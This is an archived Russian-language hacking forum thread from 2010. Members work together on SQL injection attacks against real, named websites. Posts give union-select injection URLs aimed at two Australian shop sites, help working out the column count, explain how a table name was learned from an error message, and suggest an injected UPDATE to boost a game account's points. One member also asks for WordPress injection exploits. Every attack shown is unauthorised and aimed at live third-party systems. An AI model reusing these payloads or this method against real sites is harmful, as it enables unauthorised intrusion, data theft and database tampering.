HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15661  
Старый 19.11.2010, 19:06
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

Смотря что ты хочешь... если получить в базе addpoint+1, то да, если увеличить addpoint на единицу, то нет и, кстати, первый апостроф (перед update не нужен)
 
Ответить с цитированием

  #15662  
Старый 19.11.2010, 19:09
killrok6
Guest
Сообщений: n/a
Провел на форуме:
10390

Репутация: 0
По умолчанию

Цитата:
Сообщение от z0mbyak  
z0mbyak said:
Смотря что ты хочешь... если получить в базе addpoint+1, то да, если увеличить addpoint на единицу, то нет и, кстати, первый апостроф (перед union не нужен)
union+update/**/dbo.character/**/set/**/addpoint='addpoint+1'/**/where/**/accountid='killro0000'

Типо так?
 
Ответить с цитированием

  #15663  
Старый 19.11.2010, 19:17
z0mbyak
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме:
168709

Репутация: 1
По умолчанию

Если нужен инкремент addpoint, то /set/**/addpoint='addpoint'+1/

без union, это я обшибся малость

Вот пример

http://www.mysql.ru/webboard/index.html?n1=1160&n2=2
 
Ответить с цитированием

  #15664  
Старый 19.11.2010, 20:55
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Цитата:
Сообщение от pinch  
pinch said:
http://www.diymtb.com.au/displayItems.asp?cid=14'+union+select+1,2,concat(v ersion(),0x3a,database(),0x3a,user()),4,5,6,7,8,9, 10%23
Все равно, не могу найти. Набираю в браузере:

http://www.diymtb.com.au/displayItems.asp?cid=14'+union+select+1,2,user(),4 ,5,6,7,8,9,10%23

и, где выводиться user()?
 
Ответить с цитированием

  #15665  
Старый 19.11.2010, 21:11
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

дайте ссылки на уязвимости (только php-inj.sql-inj) в Wordpress версии:

2.7

2.9.2

3.0

3.0.1
 
Ответить с цитированием

  #15666  
Старый 19.11.2010, 21:12
Чакэ
Guest
Сообщений: n/a
Провел на форуме:
90728

Репутация: 62
По умолчанию

Цитата:
Сообщение от z0mbyak  
z0mbyak said:
Если нужен инкремент addpoint, то /set/**/addpoint='addpoint'+1/
без union, это я обшибся малость
Вот пример
http://www.mysql.ru/webboard/index.html?n1=1160&n2=2
ну и кагбэ в инкременте ошиблись немного. кавычки не нужны, совсем.
 
Ответить с цитированием

  #15667  
Старый 19.11.2010, 22:17
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Помогите подобрать количество столбцов.

http://calidad.com.au/ProdSearchResult.asp?cID=948-BK2'
 
Ответить с цитированием

  #15668  
Старый 20.11.2010, 01:17
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Код:
Code:
http://calidad.com.au/ProdSearchResult.asp?cID=948-BK2' union select 1,2,3,4,5 from CalProd where 1 and '1
Бд - McAccess

Имхо, одна из самых неблагодарных субд для проведения инъекций)

И к тому же из-за наличия второго запроса с иным количеством полей мы не получим вывод)

Так что советую поискать другие параметры, бо (проверил) они там присутствуют.

З.ы - более подробно можно почитать тут:

/threadnav50550-1.html
 
Ответить с цитированием

  #15669  
Старый 20.11.2010, 19:21
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Цитата:
Сообщение от kamaz  
kamaz said:
Код:
Code:
http://calidad.com.au/ProdSearchResult.asp?cID=948-BK2' union select 1,2,3,4,5 from CalProd where 1 and '1
Не могли бы вы уточнить, как вы нашли таблицу from CalProd. Это brutforce или какой то иной способ? Заранее спасибо за ответ.
 
Ответить с цитированием

  #15670  
Старый 20.11.2010, 20:49
kamaz
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013

Репутация: 453
Отправить сообщение для kamaz с помощью ICQ
По умолчанию

Таблицу нашел исходя из сообщения об ошибке вот тут:

Код:
Code:
http://calidad.com.au/FindProdStep1.asp?MAN=Olivetti%27%29
Других способов узнать имена таблиц (кроме перебора, конечно же) в данном случае нет. Так как доступ к таблице MSysObjects закрыт.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ